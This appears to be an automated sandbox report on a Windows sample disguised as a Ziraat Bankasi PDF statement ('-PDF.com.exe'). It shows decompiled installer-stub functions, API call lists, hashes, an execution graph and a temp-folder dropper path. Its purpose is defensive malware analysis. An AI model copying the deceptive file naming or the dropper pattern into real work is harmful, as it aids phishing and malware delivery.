                                                    • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 2584051700-0
                                                  • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                  • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                  • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                  • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                  0x00401c43
                                                  0x00401c45
                                                  0x00401c4c
                                                  0x00401c4f
                                                  0x00401c52
                                                  0x00401c5c
                                                  0x00401c60
                                                  0x00401c63
                                                  0x00401c6c
                                                  0x00401c6c
                                                  0x00401c6f
                                                  0x00401c73
                                                  0x00401c7c
                                                  0x00401c7c
                                                  0x00401c7f
                                                  0x00401c83
                                                  0x00401c85
                                                  0x00401cda
                                                  0x00401cdc
                                                  0x00401ce7
                                                  0x00401cf1
                                                  0x00401cf4
                                                  0x00401cf4
                                                  0x00401cfd
                                                  0x00000000
                                                  0x00401c87
                                                  0x00401c8e
                                                  0x00401c90
                                                  0x00401c93
                                                  0x00401c99
                                                  0x00401ca0
                                                  0x00401ca3
                                                  0x00401ccb
                                                  0x00401d03
                                                  0x00401d03
                                                  0x00401ca5
                                                  0x00401cb3
                                                  0x00401cbb
                                                  0x00401cbe
                                                  0x00401cbe
                                                  0x00401ca3
                                                  0x00401d06
                                                  0x00401d09
                                                  0x00401d0f
                                                  0x00402ba4
                                                  0x00402ba4
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                  • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                  • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                  • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                  0x00406544
                                                  0x00406546
                                                  0x0040655b
                                                  0x0040655e
                                                  0x00406563
                                                  0x00406568
                                                  0x004065a6
                                                  0x004065a6
                                                  0x0040656a
                                                  0x0040657c
                                                  0x00406587
                                                  0x0040658d
                                                  0x00406598
                                                  0x00000000
                                                  0x00000000
                                                  0x00406598
                                                  0x004065ac

                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,?,?,0040679D,80000002), ref: 0040657C
                                                  • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,00422728), ref: 00406587
                                                  Strings
                                                  • "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i, xrefs: 0040653D
                                                  • ('B, xrefs: 0040655B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i$('B
                                                  • API String ID: 3356406503-179150024
                                                  • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                  • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                  0x00405f38
                                                  0x00405f45
                                                  0x00405f46
                                                  0x00405f51
                                                  0x00405f59
                                                  0x00405f59
                                                  0x00405f61

                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,0040362D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,0040362D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00405F47
                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F37
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 2659869361-2382934351
                                                  • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                  • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                  • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                  • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 89%
                                                  			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                                  0x00405642
                                                  0x0040564c
                                                  0x00405668
                                                  0x0040568a
                                                  0x0040568d
                                                  0x00405693
                                                  0x0040569d
                                                  0x0040569e
                                                  0x004056a0
                                                  0x004056a6
                                                  0x004056a6
                                                  0x004056b0
                                                  0x00000000
                                                  0x004056be
                                                  0x00405675
                                                  0x004056ad
                                                  0x004056ad
                                                  0x00000000
                                                  0x004056ad
                                                  0x00405681
                                                  0x00405683
                                                  0x00000000
                                                  0x00405683
                                                  0x00405652
                                                  0x00000000
                                                  0x00000000
                                                  0x00405659
                                                  0x00000000

                                                  APIs
                                                  • IsWindowVisible.USER32 ref: 0040566D
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                    • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                  • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                  • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                  • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                  0x00405f84
                                                  0x00405f8e
                                                  0x00405f91
                                                  0x00405f97
                                                  0x00405f98
                                                  0x00405f99
                                                  0x00405fa1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405fa1
                                                  0x00405fa3
                                                  0x00405fab

                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F89
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3976562730
                                                  • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                  • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                  • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                  • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                  0x004060cd
                                                  0x004060cf
                                                  0x004060d2
                                                  0x004060fe
                                                  0x004060d7
                                                  0x004060e0
                                                  0x004060e5
                                                  0x004060f0
                                                  0x004060f3
                                                  0x0040610f
                                                  0x004060f5
                                                  0x004060fc
                                                  0x00000000
                                                  0x004060fc
                                                  0x00406108
                                                  0x0040610c
                                                  0x0040610c
                                                  0x00406106
                                                  0x00000000

                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                  • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                  • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                  • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                  • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                  • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:4.4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:2.3%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:53
                                                  execution_graph 16013 10a8e08 16025 10a61f0 16013->16025 16015 10a8e14 DecodePointer 16016 10a8e24 16015->16016 16026 10a8e40 16016->16026 16025->16015 16027 10a8e4c _wprintf 16026->16027 16028 10a7a00 _localeconv 70 API calls 16027->16028 16031 10a8e51 16028->16031 16029 10a4800 _abort 74 API calls 16030 10a8e73 16029->16030 16032 10a7a00 _localeconv 70 API calls 16030->16032 16031->16029 16033 10a8e79 16032->16033 14379 10b210d 14380 10b2125 14379->14380 14385 10b2147 14379->14385 14380->14385 14388 10b21de __output_p_l __output_s_l 14380->14388 14394 10b21c8 14380->14394 14381 10b1e12 14384 10a6117 _wprintf 70 API calls 14381->14384 14382 10b2c2b 14383 10b2bfa 14386 10b20f7 14383->14386 14392 10a8c4b _free 70 API calls 14383->14392 14387 10b1e17 14384->14387 14385->14381 14385->14386 14385->14388 14400 10a8ccd __malloc_crt 70 API calls 14385->14400 14402 10b2533 14385->14402 14414 10b2211 __aulldvrm _strlen 14385->14414 14391 10a4035 _wprintf 9 API calls 14387->14391 14388->14381 14388->14414 14389 10b25a9 DecodePointer 14403 10b261a 14389->14403 14390 10b2ae0 14426 10b2e43 14390->14426 14398 10b1e22 14391->14398 14392->14386 14393 10b2253 14419 10b52c6 14393->14419 14394->14381 14394->14388 14394->14393 14394->14414 14407 10a5b2a __wsetlocale_set_cat 6 API calls 14398->14407 14400->14402 14402->14381 14402->14389 14405 10b2646 14403->14405 14408 10b2630 DecodePointer 14403->14408 14404 10b2b2b 14406 10b2bae 14404->14406 14415 10b2b41 14404->14415 14412 10b2655 DecodePointer 14405->14412 14405->14414 14411 10b2e43 _write_string 103 API calls 14406->14411 14410 10b1e47 14407->14410 14408->14405 14409 10b2e17 _write_multi_char 103 API calls 14409->14404 14416 10b2ba1 14411->14416 14412->14414 14413 10b52c6 __cftof 82 API calls 14413->14415 14414->14382 14414->14383 14414->14390 14422 10b2e17 14414->14422 14415->14413 14415->14416 14417 10b2e43 _write_string 103 API calls 14415->14417 14416->14383 14418 10b2e17 _write_multi_char 103 API calls 14416->14418 14417->14415 14418->14383 14430 10b5173 14419->14430 14424 10b2e22 14422->14424 14425 10b2e3f 14422->14425 14424->14425 14451 10b2dd1 14424->14451 14425->14390 14428 10b2e59 14426->14428 14427 10b2dd1 103 API calls __output_s_l 14427->14428 14428->14427 14429 10b2b09 14428->14429 14429->14404 14429->14409 14431 10b5185 14430->14431 14432 10b5189 14431->14432 14433 10b51bb 14431->14433 14434 10b51aa 14431->14434 14432->14414 14435 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 14433->14435 14436 10a6117 _wprintf 70 API calls 14434->14436 14437 10b51c6 14435->14437 14438 10b51af 14436->14438 14439 10b5233 WideCharToMultiByte 14437->14439 14440 10b51d3 14437->14440 14441 10a4035 _wprintf 9 API calls 14438->14441 14443 10b5263 GetLastError 14439->14443 14444 10b51e1 _memset 14439->14444 14442 10b521a _memset 14440->14442 14440->14444 14441->14432 14442->14432 14446 10a6117 _wprintf 70 API calls 14442->14446 14443->14442 14443->14444 14444->14432 14445 10a6117 _wprintf 70 API calls 14444->14445 14447 10b51f9 14445->14447 14448 10b5286 14446->14448 14449 10a6117 _wprintf 70 API calls 14447->14449 14450 10a4035 _wprintf 9 API calls 14448->14450 14449->14432 14450->14432 14452 10b2ddd 14451->14452 14453 10b2de8 14452->14453 14455 10ab4ea 14452->14455 14453->14424 14479 10a732b InitOnceExecuteOnce 14455->14479 14457 10ab4f3 14458 10ab4f7 14457->14458 14459 10a66b0 __fflush_nolock 70 API calls 14457->14459 14458->14453 14460 10ab507 14459->14460 14461 10ab51f 14460->14461 14462 10ab512 14460->14462 14464 10ab524 14461->14464 14465 10ab53b _wprintf 14461->14465 14463 10a6117 _wprintf 70 API calls 14462->14463 14472 10ab517 14463->14472 14466 10a6117 _wprintf 70 API calls 14464->14466 14465->14472 14473 10ae41e __isatty 71 API calls 14465->14473 14475 10ab58a 14465->14475 14478 10ab595 14465->14478 14466->14472 14467 10ab619 14469 10a9ce9 __write 103 API 